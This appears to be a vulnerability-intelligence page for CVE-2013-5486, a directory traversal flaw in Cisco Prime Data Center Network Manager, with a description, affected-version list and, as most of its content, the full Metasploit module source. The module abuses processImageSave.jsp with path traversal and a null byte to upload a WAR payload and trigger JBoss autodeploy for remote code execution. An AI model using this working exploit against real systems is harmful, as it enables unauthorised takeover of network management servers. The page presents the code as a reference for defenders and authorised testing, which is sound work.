VIR Vulnerability Intelligence Relay

CVE-2013-5486

critical
Published 2013-09-23 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Directory traversal vulnerability in processImageSave.jsp in DCNM-SAN Server in Cisco Prime Data Center Network Manager (DCNM) before 6.2(1) allows remote attackers to write arbitrary files via the chartid parameter, aka Bug IDs CSCue77035 and CSCue77036. NOTE: this can be leveraged to execute arbitrary commands by using the JBoss autodeploy functionality.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-30008 remote java verified ruby ยท 5 KB
Metasploit ยท 2013-12-03

Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)

ruby exploit Source: Exploit-DB 
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
      'Description' => %q{
        This module exploits a code execution flaw in Cisco Data Center Network Manager. The
        vulnerability exists in processImageSave.jsp, which can be abused through a directory
        traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
        application server feature is used to achieve remote code execution. This module has been
        tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
        (64 bits).
      },
      'Author'       =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-5486'],
          [ 'OSVDB', '97426' ],
          [ 'ZDI', '13-254' ],
          [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
        ],
      'Privileged'  => true,
      'Platform'    => 'java',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'Cisco DCNM 6.1(2) / Java Universal',
            {
              'AutoDeployPath' => "../../../../../deploy",
              'CleanupPath'    => "../../jboss-4.2.2.GA/server/fm/deploy"
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 18 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/']),
        OptInt.new('ATTEMPTS', [true, 'The number of attempts to execute the payload (auto deployed by JBoss)', 10])
      ], self.class)
  end

  def upload_file(location, filename, contents)
    res = send_request_cgi(
      {
        'uri'         => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
        'method'      => 'POST',
        'encode_params' => false,
        'vars_post'   =>
          {
            "mode"     => "save",
            "savefile" => "true",
            "chartid"  => "#{location}/#{filename}%00",
            "data"     => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
          }
      })

    if res and res.code == 200 and res.body.to_s =~ /success/
      return true
    else
      return false
    end
  end

  def check
    version = ""

    res = send_request_cgi({
      'url'    => target_uri.to_s,
      'method' => 'GET'
    })

    unless res
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and
        res.body.to_s =~ /Data Center Network Manager/ and
        res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
      version = $1
      print_status("Cisco Primer Data Center Network Manager version #{version} found")
    elsif res.code == 200 and
        res.body.to_s =~ /Data Center Network Manager/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end

    if version =~ /6\.1/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    attempts = datastore['ATTEMPTS']
    fail_with(Failure::BadConfig, "#{peer} - Configure 1 or more ATTEMPTS") unless attempts > 0

    app_base = rand_text_alphanumeric(4+rand(32-4))

    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
    war = payload.encoded_war({ :app_name => app_base }).to_s
    war_filename = "#{app_base}.war"
    war_location = target['AutoDeployPath']

    print_status("#{peer} - Uploading WAR file #{war_filename}...")
    res = upload_file(war_location, war_filename, war)

    if res
      register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
    end


    attempts.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi(
        {
          'uri'    => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
          'method' => 'GET'
        })
      # Failure. The request timed out or the server went away.
      fail_with(Failure::TimeoutExpired, "#{peer} - The request timed out or the server went away.") if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end

end

Metasploit modules

exploit_multi/http/cisco_dcnm_upload rank 600
Cisco Prime Data Center Network Manager Arbitrary File Upload
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
cisco ciscoprime_data_center_network_manager4.1\(2\)
cisco ciscoprime_data_center_network_manager4.1\(3\)
cisco ciscoprime_data_center_network_manager4.1\(4\)
cisco ciscoprime_data_center_network_manager4.1\(5\)
cisco ciscoprime_data_center_network_manager4.2\(1\)
cisco ciscoprime_data_center_network_manager4.2\(3\)
cisco ciscoprime_data_center_network_manager5.0\(2\)
cisco ciscoprime_data_center_network_manager5.0\(3\)
cisco ciscoprime_data_center_network_manager5.1\(1\)
cisco ciscoprime_data_center_network_manager5.1\(2\)
cisco ciscoprime_data_center_network_manager5.1\(3u\)
cisco ciscoprime_data_center_network_manager5.2\(2\)
cisco ciscoprime_data_center_network_manager5.2\(2a\)
cisco ciscoprime_data_center_network_manager5.2\(2b\)
cisco ciscoprime_data_center_network_manager5.2\(2c\)
cisco ciscoprime_data_center_network_manager5.2\(2e\)
cisco ciscoprime_data_center_network_manager6.1\(1a\)
cisco ciscoprime_data_center_network_manager6.1\(1b\)
cisco ciscoprime_data_center_network_manager{"endIncluding":"6.1\\(1b\\)"}

References

CWEs

CWE-78

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.